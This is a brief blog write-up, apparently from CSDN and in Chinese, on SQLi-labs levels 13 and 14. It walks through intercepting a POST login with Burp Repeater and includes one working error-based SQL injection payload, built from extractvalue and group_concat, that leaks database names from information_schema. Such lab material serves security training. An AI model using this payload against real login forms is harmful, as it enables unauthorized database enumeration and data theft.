Less-13 POST – Double Injection – Single quotes- String -twist (POST单引号变形双注入)
1,观察index.php中$sql
2,将登陆信息输进去后再用burp拦截
3.repeater一下
4,把uname那改一改,显示了一部分数据库
aaa') and extractvalue(1,concat('%',(select group_concat(schema_name) from information_schema.schemata) )) --+
Less-14
POST – Double Injection – Single quotes- String -twist (POST单引号变形双注入)
同上步骤
版权声明:本文为m0_68980215原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。